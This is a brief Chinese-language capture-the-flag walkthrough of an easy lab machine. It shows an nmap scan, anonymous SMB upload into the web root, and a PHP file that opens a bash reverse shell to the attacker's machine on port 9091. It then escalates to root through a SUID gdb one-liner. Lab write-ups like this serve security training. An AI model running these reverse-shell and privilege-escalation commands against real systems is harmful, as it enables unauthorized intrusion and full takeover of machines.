基本信息
难度:简单
靶机:192.168.194.11
kali:192.168.194.9
扫描
常规nmap扫描起手
nmap -sT -sV -A -T4 192.168.194.11 -p-
查看smb服务开启目录
139和445端口的smb服务直接以访客账号登录,无需密码验证成功。对应的html目录应该是web服务的根目录,因此,上传反弹shell文件。
2.php 文件内容如下
<?php
system("bash -c 'bash -i >&/dev/tcp/192.168.194.9/9091 <&1'");
?>
查看用户路径下的flag
提权
查看id、suid、sudo等信息
看到suid中有gdb命令可以使用
利用对应exp,或者gdb -nx -ex "python import os; os.setuid(0)" -ex "!sh" quit
提权成功,查看flag